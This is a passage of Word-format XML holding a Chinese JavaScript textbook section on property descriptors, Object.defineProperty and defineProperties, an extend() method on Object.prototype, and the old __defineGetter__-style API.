    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从函数名字就可以看出，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>只能得到自有属性的描述符。要想获得继承属性的特性，需要遍历原型链（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要想设置属性的特性，或者想让新建属性具有某种特性，则需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.define</w:t>
      </w:r>
      <w:r>
        <w:t>Peoperty()</w:t>
      </w:r>
      <w:r>
        <w:t>，传入要修改的对象、要创建或修改的属性的名称以及属性描述符对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={};//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>添加一个不可枚举的数据属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，并赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,"x",{value:1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writable:true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:false,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:true});//</w:t>
      </w:r>
      <w:r>
        <w:t>属性是存在的，但不可枚举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x;//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.keys(o)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>[]//</w:t>
      </w:r>
      <w:r>
        <w:t>现在对属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>做修改，让它变为只读</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,"x",{writable:false});//</w:t>
      </w:r>
      <w:r>
        <w:t>试图更改这个属性的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>o.x=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>操作失败但不报错，而在严格模式中抛出类型错误异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1//</w:t>
      </w:r>
      <w:r>
        <w:t>属性依然是可配置的，因此可以通过这种方式对它进行修改</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,"x",{value:2});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2//</w:t>
      </w:r>
      <w:r>
        <w:t>现在将</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>从数据属性修改为存取器属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,"x",{get:function(){return 0;}});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>的属性描述符对象不必包含所有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个特性。对于新创建的属性来说，默认的特性值是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。对于修改的已有属性来说，默认的特性值没有做任何修改。注意，这个方法要么修改已有属性要么新建自有属性，但不能修改继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果要同时修改或创建多个属性，则需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>。第一个参数是要修改的对象，第二个参数是一个映射表，它包含要新建或修改的属性的名称，以及它们的属性描述符，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>p=Object.defineProperties({},{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x:{value:1,writable:true,enumerable:true,configurable:true},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y:{value:1,writable:true,enumerable:true,configurable:true},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r:{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get:function(){return Math.sqrt(this.x*this.x+this.y*this.y)},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:true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这段代码从一个空对象开始，然后给它添加两个数据属性和一个只读存取器属性。最终</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>返回修改后的对象（和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>一样）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于那些不允许创建或修改的属性来说，如果用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>对其操作（新建或修改）就会抛出类型错误异常，比如，给一个不可扩展的对象（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）新增属性就会抛出类型错误异常。造成这些方法抛出类型错误异常的其他原因</w:t>
      </w:r>
      <w:r>
        <w:t>则和特性本身相关。可写性控制着对值特性的修改。可配置性控制着对其他特性（包括属性是否可以删除）的修改。然而规则远不止这么简单，例如，如果属性是可配置的话，则可以修改不可写属性的值。同样，如果属性是不可配置的，仍然可以将可写属性修改为不可写属性。下面是完整的规则，任何对</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>违反规则的使用都会抛出类型错误异常：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象是不可扩展的，则可以编辑已有的自有属性，但不能给它添加新属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果属性是不可配置的，则不能修改它的可配置性和可枚举性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果存取器属性是不可配置的，则不能修改其</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，也不能将它转换为数据属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果数据属性是不可配置的，则不能将它转换为存取器属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果数据属性是不可配置的，则不能将它的可写性从</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>修改为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，但可以从</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>修改为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果数据属性是不可配置且不可写的，则不能修改它的值。然而可配置但不可写属性的值是可以修改的（实际上是先将它标记为可写的，然后修改它的值，最后转换为不可写的）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>中实现了</w:t>
      </w:r>
      <w:r>
        <w:t>ex</w:t>
      </w:r>
      <w:r>
        <w:t>tend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这个函数把一个对象的属性复制到另一个对象中。这个函数只是简单地复制属性名和值，没有复制属性的特性，而且也没有复制存取器属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，只是将它们简单地转换为静态的数据属性。例</w:t>
      </w:r>
      <w:r>
        <w:t>6-3</w:t>
      </w:r>
      <w:r>
        <w:t>给出了改进的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>，它使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>对属性的所有特性进行复制。新的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>作为不可枚举属性添加到</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中，因此它是</w:t>
      </w:r>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:t>上定义的新方法，而</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个独立的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>6-3</w:t>
      </w:r>
      <w:r>
        <w:t>：复制属性的特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添加一个不可枚举的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法继承自调用它的对象，将作为参数传入的对象的属性一一复制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>除了值之外，也复制属性的所有特性，除非在目标对象中存在同名的属性，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>参数对象的所有自有对象（包括不可枚举的属性）也会一一复制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(Object.prototype,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"extend",//</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype.extend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writabl</w:t>
      </w:r>
      <w:r>
        <w:t>e:true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:false,//</w:t>
      </w:r>
      <w:r>
        <w:t>将其定义为不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:function(o){//</w:t>
      </w:r>
      <w:r>
        <w:t>值就是这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>得到所有的自有属性，包括不可枚举属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var names=Object.getOwnPropertyNames(o);//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>names.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果属性已经存在，则跳过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(names[i]in this)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性的描述符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var desc=Objec</w:t>
      </w:r>
      <w:r>
        <w:t>t.getOwnPropertyDescriptor(o,names[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>用它给</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(this,names[i],desc);</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150" w:name="getterHe_setterDe_Lao_Shi_API"/>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>的老式</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的对象直接量语法给新对象定义存取器属性，但不能查询属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法或给已有的对象添加新的存取器属性。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>来完成这些工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>标准被采纳之前，大多数</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现（</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器除外）已经可以支持对象直接量语法中的</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>写法。这些实现提供了非标准的老式</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>用来查询和设置</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个方法组成，所有对象都拥有这些方法。</w:t>
      </w:r>
      <w:r>
        <w:t>__lookupGetter__()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>__lookupSetter__()</w:t>
      </w:r>
      <w:r>
        <w:t>用以返回一个命名属性的</w:t>
      </w:r>
      <w:r>
        <w:t>ge</w:t>
      </w:r>
      <w:r>
        <w:t>tter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t>__defineGetter__()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>__defineSetter__()</w:t>
      </w:r>
      <w:r>
        <w:t>用以定义</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>，这两个函数的第一个参数是属性名字，第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个方法都是以两条下划线作前缀，两条下划线作后缀，以表明它们是非标准的方法。本书第三部分没有对非标准的方法做介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="6_8_Dui_Xiang_De_San_Ge_Shu_Xing_"/>
      <w:r>
        <w:t>6.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对象的三个属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每一个对象都有与之相关的原型（</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>）、类（</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>）和可扩展性（</w:t>
      </w:r>
      <w:r>
        <w:t>extensible attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）。下面几节将会展开讲述这些属性有</w:t>
      </w:r>
      <w:r>
        <w:t>什么作用，以及如何查询和设置它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="6_8_1_Yuan_Xing_Shu_Xing_"/>
